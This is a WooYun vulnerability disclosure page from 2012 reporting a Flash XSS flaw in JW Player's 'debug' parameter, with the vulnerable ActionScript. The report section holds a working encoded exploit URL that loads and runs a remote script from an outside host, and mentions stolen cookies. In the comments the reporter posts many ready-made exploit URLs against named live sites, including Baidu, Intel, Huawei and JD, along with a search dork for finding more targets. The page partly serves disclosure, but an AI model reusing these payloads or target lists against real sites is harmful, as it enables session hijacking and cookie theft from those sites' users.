当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07166

漏洞标题:JWPlayer Xss 0day [Flash编程安全问题]

相关厂商:LongTail Video

漏洞作者: gainover

提交时间:2012-05-15 23:35

修复时间:2012-05-15 23:35

公开时间:2012-05-15 23:35

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国外的一款播放器,使用网站数量超过百万,官方介绍:“LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the - JW Player - is active on over one million websites and streams billions of videos each month.”
该FLASH版本视频播放器代码编写上存在一处安全问题,利用之前我所用到的技巧,可以进行跨站攻击。
它自己主站跨站到无所谓啦,但是用到这个播放器的其它网站就难说了。
比如中国的“去哪儿” ,美国的某某某某站。。

详细说明:

A Xss vulnerability in JWPlayer
Test Browser: IE , Firefox.
Test Platform: Win 7.
1. The Bug code in
package com.longtailvideo.jwplayer.utils
class Logger
private static function send(_arg1:String):void
if (ExternalInterface.available){
ExternalInterface.call(_config.debug, text);<---directly use _config.debug
};
2. The _config.debug is directly used as the first parameter of ExternalInterface.call. And the _config is loaded from loaderInfo.parameters. Therefore, when we construct a link such as " jwplayer.swf?debug=(function(){alert('xxx')})() ", the passed-in javascript code will be run.
3. Then we can use the trick location.href='javascript:"<script src={js file url}></script>"' to load and run external javascript file.
Test encoded evil code:

http://player.longtailvideo.com/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)


4. That's all

漏洞证明:

1. Simple Alert


2. Stolen Cookies in a chinese e-commerce website.

修复方案:

Limit the length of "debug" parameters and check its content.

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:5 (WooYun评价)

漏洞评价:

评论

  1. 2012-05-15 23:40 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    跨站师,去把各大视频网站扫荡一遍吧!

  2. 2012-05-15 23:47 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @去哪儿 关于这个播放器的,俺也不单独发了。。 http://tuan.qunar.com/static/img/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D%29

  3. 2012-05-16 00:24 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @Intel http://www.intel.com/about/companyinfo/healthcare/products/reader/swf/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D%29

  4. 2012-05-16 00:31 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @百度 http://youxi.baidu.com/media/player.swf?debug=function(){alert(/xxx/)} 貌似服务器那边过滤了' 利用代码上需要稍微变通

  5. 2012-05-16 00:34 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @AT&T http://pte.att.com/player.swf?debug=alert

  6. 2012-05-16 00:36 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @百度 http://www.baidu.com/search/zhidao/badminton/jwplayer/player.swf?debug=alert 主域名的

  7. 2012-05-16 00:37 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @百度 http://ued.baidu.com/wp-content/plugins/flash-video-player/mediaplayer/player.swf?debug=alert 百度UED,看来很多装了WP的都用了这个插件。

  8. 2012-05-16 00:38 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @百度 http://sem.baidu.com/jw_player/player.swf?debug=alert

  9. 2012-05-16 00:39 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 你妹。。你怎么搜索的。。我怎么没找到这么多

  10. 2012-05-16 00:44 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 = = GOOGLE inurl:(player.swf) 其它的你懂的。。

  11. 2012-05-16 00:44 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @新浪 http://nokia.sina.com.cn/n8/player/player.swf?debug=alert

  12. 2012-05-16 00:48 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 别爆了,留着刷分。。。

  13. 2012-05-16 00:53 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @蟋蟀哥哥 = = 这些都给厂商算了,反正我也没用的到的地方。。 这文章已经公开了,被别人拿去做坏事了也不太好,先把大站好找的找了先咯。。

  14. 2012-05-16 00:53 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @gainover 哈哈。。

  15. 2012-05-16 01:09 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @猫扑 http://yximg.mop.com/minisite/201007/baodaopage/Scripts/player.swf?debug=alert

  16. 2012-05-16 01:10 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @猫扑 http://yximg.mop.com/minisite/200911/jilie/Scripts/player.swf?debug=alert

  17. 2012-05-16 02:08 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @中国网络电视台 http://t.live.cntv.cn/oceantest/player.swf?debug=alert

  18. 2012-05-16 02:12 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @走秀网 http://tuan.xiu.com/static/theme/YellowUMZZ/img/player.swf?debug=alert

  19. 2012-05-16 02:13 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @百合网 http://images.baihe.com/images/landingpage/images/video/player.swf?debug=alert = = 感觉每个站都在用这个播放器

  20. 2012-05-16 02:17 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @百合网 http://act.baihe.com/event/1104lovevideo/player.swf?debug=alerthttp://story.baihe.com/player.swf?debug=alerthttp://act.baihe.com/event/1009zhidao/player.swf?debug=alerthttp://act.baihe.com/event/1026zhidao/player.swf?debug=alert另外 act.baihe.com 与 story.baihe.com , images.baihe.com 全部都存在apache http-only cookies 泄漏漏洞。

  21. 2012-05-16 02:19 | testcvc ( 路人 | Rank:5 漏洞数:1 | test)

    @gainover 大站都快被你爆完了

  22. 2012-05-16 02:21 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    我嘞个去。灾难来了。。。。

  23. 2012-05-16 02:21 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @诺基亚 http://blog.maps.nokia.com/wp-content/plugins/vipers-video-quicktags/resources/jw-flv-player/player.swf?debug=alert

  24. 2012-05-16 02:24 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @gainover .....................................这个cncert应该要预警了吧?@cncert国家互联网应急中心 呼叫,呼叫

  25. 2012-05-16 02:28 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @zeracker = = 不晓得, 反正国内用这个程序的不在少数。 腾讯啥的也有用,不过他们用的是旧版的。。4.1的。 感觉其实这个可以交给 cncert 处理的。

  26. 2012-05-16 02:40 | 小禾吉 ( 路人 | Rank:0 漏洞数:1 | 宇宙的目的很可能和人类没有关系,宇宙很可...)

    这个很霸气~

  27. 2012-05-16 02:45 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @京东商城 http://market.360buy.com/zhuanmai/ECOVACS/player.swf?debug=alert

  28. 2012-05-16 02:47 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @华为 http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alert

  29. 2012-05-16 02:51 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @华为技术有限公司 好像挺多。。http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alerthttp://www-hk.huawei.com/cn/ucmf/groups/public/documents/webasset/player.swfhttp://ipv6.huawei.com/cn/ucmf/groups/public/documents/webasset/player.swfhttp://www.huawei.com/minisite/mwc2012/cn/js/player.swfhttp://www.huawei.com/za/ucmf/groups/public/documents/webasset/player.swf以下省略若干个

  30. 2012-05-16 02:52 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @4399小游戏 http://news.4399.com/tnt/images/player.swf?debug=alert

  31. 2012-05-16 02:54 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @4399小游戏 http://news.4399.com/dnf/flash/player.swf DNF。。。 不会每个游戏目录下都有一个吧!!

  32. 2012-05-16 03:00 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @盛大在线 http://qn.sdo.com/web1/swf/player.swfhttp://qn.sdo.com/web/swf/player.swfhttp://media.static.sdo.com/ac/ac/project/acguide/flash/player.swf?debug=alert

  33. 2012-05-16 03:02 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @凤凰网 http://sn.ifeng.com/guowenwangzhan/greensn/video/player.swf?debug=alert

  34. 2012-05-16 03:05 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @久游网 http://dl-hb.9you.com/play/Player.swf?debug=alert

  35. 2012-05-16 03:13 | 小博 ( 路人 | Rank:6 漏洞数:4 | 一个关注与信息安全 程序开发的IT程序员)

    别爆了

  36. 2012-05-16 03:20 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @小博 没的爆了,差不多就这么些吧~~ 肯定还有一些是改过名字,不叫player.swf 的~~ 得换个方法搜索了

  37. 2012-05-16 03:33 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    试了下,果然有不叫player.swf的比如新浪的@新浪http://all.vic.sina.com.cn/listerine21days/flash/player/player-viral.swf

  38. 2012-05-16 03:35 | 小博 ( 路人 | Rank:6 漏洞数:4 | 一个关注与信息安全 程序开发的IT程序员)

    @gainover 好的 还有发现的么 我去提交个 看能不能换个新浪的礼物

  39. 2012-05-16 05:58 | yingzi ( 实习白帽子 | Rank:38 漏洞数:3 )

    关注中

  40. 2012-05-16 05:58 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @cncert国家互联网应急中心 有预警这东西么?

  41. 2012-05-16 08:05 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    危险系数很高!!

  42. 2012-05-16 08:59 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    这么危险的东西,看来好多网站限制使用swf还是有先见之明的。

  43. 2012-05-16 09:34 | 123 ( 路人 | Rank:27 漏洞数:3 | 123)

    帅气,我先把我的换掉

  44. 2012-05-16 09:45 | ufohacker ( 路人 | Rank:3 漏洞数:1 | 提高的是能力不是技术!)

    求一次完整的攻击实例。

  45. 2012-05-16 10:12 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    我了个去,试了下基本都是国内的弹框,国外的还没找到个能弹的,难道是后门......同志还需努力啊,代码还是自己敲的好,拷贝来拷贝去的终归不是长久之计。

  46. 2012-05-16 10:29 | Power ( 实习白帽子 | Rank:54 漏洞数:22 | 还需要等待.........)

    太牛逼了.........

  47. 2012-05-16 10:40 | hellok ( 普通白帽子 | Rank:123 漏洞数:10 | 酱油党路过)

    cool~

  48. 2012-05-16 10:51 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    JWPlayer的使用量已经达到类似于框架使用的范围,所以出问题这么多也不奇怪。

  49. 2012-05-16 11:10 | Lee ( 普通白帽子 | Rank:113 漏洞数:24 | wataru@eviloctal.com)

    good!

  50. 2012-05-16 11:41 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    威武!求共享命令行下反编译工具!!!

  51. 2012-05-16 12:13 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @p.z = = 哭一个,我没找到。。 swftools里没有把swf转as的。。 就只看到一个在线转换的 swf2as (真想搞到源码)。 不过ASV有批量的功能。

  52. 2012-05-16 16:34 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    牛逼了 我去

  53. 2012-05-17 16:30 | 小龙女 ( 路人 | Rank:3 漏洞数:2 | venus)

    super ,ps,为啥我是见习白帽子

  54. 2012-05-17 22:51 | 肥田鸡 ( 路人 | Rank:13 漏洞数:2 | 今天的最好表现是明天的最低要求)

    nice!

  55. 2012-05-18 07:48 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @小龙女 哈哈,现在wooyun等级制度了

  56. 2012-09-25 12:05 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)

    好HI